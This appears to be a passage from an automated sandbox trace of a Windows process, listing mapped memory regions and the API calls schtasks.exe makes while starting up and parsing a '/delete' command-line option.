filename = ""
Region:
id = 1499
start_va = 0x7fffffde000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1500
start_va = 0x50000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1501
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1502
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1503
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1504
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1505
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1506
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1507
start_va = 0x160000
end_va = 0x1c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1508
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1509
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1510
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1511
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1512
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1513
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1514
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1515
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1516
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1517
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1518
start_va = 0x250000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1519
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1520
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 1521
start_va = 0x350000
end_va = 0x378fff
monitored = 0
entry_point = 0x351010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1522
start_va = 0x3c0000
end_va = 0x547fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1523
start_va = 0x350000
end_va = 0x378fff
monitored = 0
entry_point = 0x351010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1524
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1525
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1526
start_va = 0x550000
end_va = 0x6d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1527
start_va = 0x6e0000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1528
start_va = 0x350000
end_va = 0x361fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 1529
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1530
start_va = 0x60000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1531
start_va = 0x370000
end_va = 0x370fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1532
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1533
start_va = 0x1ae0000
end_va = 0x1daefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1534
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1535
start_va = 0x1db0000
end_va = 0x1e2cfff
monitored = 0
entry_point = 0x1dbcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1536
start_va = 0x1e30000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 1537
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1538
start_va = 0x1db0000
end_va = 0x1e2cfff
monitored = 0
entry_point = 0x1dbcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1539
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1540
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1541
start_va = 0x1eb0000
end_va = 0x20cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001eb0000"
filename = ""
Region:
id = 1542
start_va = 0x1eb0000
end_va = 0x1f8efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 1543
start_va = 0x2050000
end_va = 0x20cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002050000"
filename = ""
Region:
id = 1544
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1545
start_va = 0x380000
end_va = 0x380fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 1546
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1547
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1548
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1549
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1550
start_va = 0x1f90000
end_va = 0x204ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 81
os_tid = 0x700
[0371.467] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd90 | out: lpSystemTimeAsFileTime=0x24fd90*(dwLowDateTime=0xf57bd200, dwHighDateTime=0x1dab598))
[0371.467] GetCurrentProcessId () returned 0x448
[0371.467] GetCurrentThreadId () returned 0x700
[0371.467] GetTickCount () returned 0x142524a
[0371.468] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x24fd98 | out: lpPerformanceCount=0x24fd98*=2125216488344) returned 1
[0371.469] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000
[0371.469] __set_app_type (_Type=0x1)
[0371.469] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe8972c) returned 0x0
[0371.470] __wgetmainargs (in: _Argc=0xffea1240, _Argv=0xffea1250, _Env=0xffea1248, _DoWildCard=0, _StartInfo=0xffea125c | out: _Argc=0xffea1240, _Argv=0xffea1250, _Env=0xffea1248) returned 0
[0371.472] _onexit (_Func=0xffe92ab0) returned 0xffe92ab0
[0371.472] _onexit (_Func=0xffe92ac4) returned 0xffe92ac4
[0371.472] _onexit (_Func=0xffe92afc) returned 0xffe92afc
[0371.473] _onexit (_Func=0xffe92b58) returned 0xffe92b58
[0371.473] _onexit (_Func=0xffe92b80) returned 0xffe92b80
[0371.473] _onexit (_Func=0xffe92ba8) returned 0xffe92ba8
[0371.474] _onexit (_Func=0xffe92bd0) returned 0xffe92bd0
[0371.474] _onexit (_Func=0xffe92bf8) returned 0xffe92bf8
[0371.474] _onexit (_Func=0xffe92c20) returned 0xffe92c20
[0371.475] _onexit (_Func=0xffe92c48) returned 0xffe92c48
[0371.482] _onexit (_Func=0xffe92c70) returned 0xffe92c70
[0371.483] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0371.483] WinSqmIsOptedIn () returned 0x0
[0371.484] GetProcessHeap () returned 0x60000
[0371.484] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9b0
[0371.485] SetLastError (dwErrCode=0x0)
[0371.487] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0371.487] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0371.487] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0371.487] VerifyVersionInfoW (in: lpVersionInformation=0x24f550, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f550) returned 1
[0371.487] GetProcessHeap () returned 0x60000
[0371.487] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9d0
[0371.487] lstrlenW (lpString="") returned 0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x2) returned 0x7b9f0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75970
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba10
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x759a0
[0371.488] GetProcessHeap () returned 0x60000
[0371.488] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x759d0
[0371.488] GetProcessHeap () returned 0x60000
[0371.489] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a00
[0371.489] GetProcessHeap () returned 0x60000
[0371.489] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a30
[0371.489] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba30
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a60
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75a90
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75ac0
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75af0
[0371.490] GetProcessHeap () returned 0x60000
[0371.490] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba50
[0371.490] GetProcessHeap () returned 0x60000
[0371.491] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b20
[0371.491] GetProcessHeap () returned 0x60000
[0371.491] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b50
[0371.491] GetProcessHeap () returned 0x60000
[0371.492] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75b80
[0371.492] GetProcessHeap () returned 0x60000
[0371.492] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75bb0
[0371.492] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0371.493] SetLastError (dwErrCode=0x0)
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75be0
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c10
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c40
[0371.493] GetProcessHeap () returned 0x60000
[0371.493] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75c70
[0371.493] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x75ca0
[0371.494] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba70
[0371.494] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.494] GetProcessHeap () returned 0x60000
[0371.494] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x208) returned 0x7bc10
[0371.494] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7bc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0371.495] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0371.500] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0371.500] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0371.504] GetProcessHeap () returned 0x60000
[0371.504] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x74e) returned 0x7c1e0
[0371.504] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0371.505] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x7c1e0 | out: lpData=0x7c1e0) returned 1
[0371.505] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0371.505] VerQueryValueW (in: pBlock=0x7c1e0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f638, puLen=0x24f6a0 | out: lplpBuffer=0x24f638*=0x7c57c, puLen=0x24f6a0) returned 1
[0371.512] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.512] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f618 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0371.512] VerQueryValueW (in: pBlock=0x7c1e0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f6a8, puLen=0x24f698 | out: lplpBuffer=0x24f6a8*=0x7c3a8, puLen=0x24f698) returned 1
[0371.513] lstrlenW (lpString="schtasks.exe") returned 12
[0371.513] lstrlenW (lpString="schtasks.exe") returned 12
[0371.513] lstrlenW (lpString=".EXE") returned 4
[0371.513] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0371.516] lstrlenW (lpString="schtasks.exe") returned 12
[0371.516] lstrlenW (lpString=".EXE") returned 4
[0371.516] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.516] lstrlenW (lpString="schtasks") returned 8
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7caf0
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb20
[0371.518] GetProcessHeap () returned 0x60000
[0371.518] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb50
[0371.519] GetProcessHeap () returned 0x60000
[0371.519] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cb80
[0371.519] GetProcessHeap () returned 0x60000
[0371.519] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7ba90
[0371.519] _memicmp (_Buf1=0x7ba90, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xa0) returned 0x7c010
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cbb0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cbe0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc10
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7bab0
[0371.520] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.520] GetProcessHeap () returned 0x60000
[0371.520] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x200) returned 0x7d2c0
[0371.521] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0371.522] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x30) returned 0x77bd0
[0371.522] _vsnwprintf (in: _Buffer=0x7c010, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f618 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] GetProcessHeap () returned 0x60000
[0371.522] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.522] GetProcessHeap () returned 0x60000
[0371.523] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x74e
[0371.523] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.523] SetLastError (dwErrCode=0x0)
[0371.524] GetThreadLocale () returned 0x409
[0371.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.524] lstrlenW (lpString="?") returned 1
[0371.524] GetThreadLocale () returned 0x409
[0371.524] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="create") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="delete") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="query") returned 5
[0371.525] GetThreadLocale () returned 0x409
[0371.525] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.525] lstrlenW (lpString="change") returned 6
[0371.525] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.526] lstrlenW (lpString="run") returned 3
[0371.526] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.526] lstrlenW (lpString="end") returned 3
[0371.526] GetThreadLocale () returned 0x409
[0371.526] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.527] lstrlenW (lpString="showsid") returned 7
[0371.527] GetThreadLocale () returned 0x409
[0371.527] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.528] SetLastError (dwErrCode=0x0)
[0371.528] SetLastError (dwErrCode=0x0)
[0371.528] lstrlenW (lpString="/delete") returned 7
[0371.528] lstrlenW (lpString="-/") returned 2
[0371.528] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.528] lstrlenW (lpString="?") returned 1
[0371.528] lstrlenW (lpString="?") returned 1
[0371.528] GetProcessHeap () returned 0x60000
[0371.528] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7c0c0
[0371.528] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.528] GetProcessHeap () returned 0x60000
[0371.528] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xa) returned 0x7c1e0
[0371.529] lstrlenW (lpString="delete") returned 6
[0371.529] GetProcessHeap () returned 0x60000
[0371.529] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7c200
[0371.529] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.530] GetProcessHeap () returned 0x60000
[0371.530] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x14) returned 0x7c220
[0371.530] _vsnwprintf (in: _Buffer=0x7c1e0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.530] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.530] lstrlenW (lpString="|?|") returned 3
[0371.530] lstrlenW (lpString="|delete|") returned 8
[0371.530] SetLastError (dwErrCode=0x490)
[0371.530] lstrlenW (lpString="create") returned 6
[0371.530] lstrlenW (lpString="create") returned 6
[0371.530] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.530] GetProcessHeap () returned 0x60000
[0371.530] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.531] GetProcessHeap () returned 0x60000
[0371.531] RtlReAllocateHeap (Heap=0x60000, Flags=0xc, Ptr=0x7c1e0, Size=0x14) returned 0x7c240
[0371.531] lstrlenW (lpString="delete") returned 6
[0371.531] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.531] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.532] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.532] lstrlenW (lpString="|create|") returned 8
[0371.532] lstrlenW (lpString="|delete|") returned 8
[0371.532] StrStrIW (lpFirst="|create|", lpSrch="|delete|") returned 0x0
[0371.532] SetLastError (dwErrCode=0x490)
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.532] lstrlenW (lpString="delete") returned 6
[0371.532] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.533] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.533] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.533] lstrlenW (lpString="|delete|") returned 8
[0371.533] lstrlenW (lpString="|delete|") returned 8
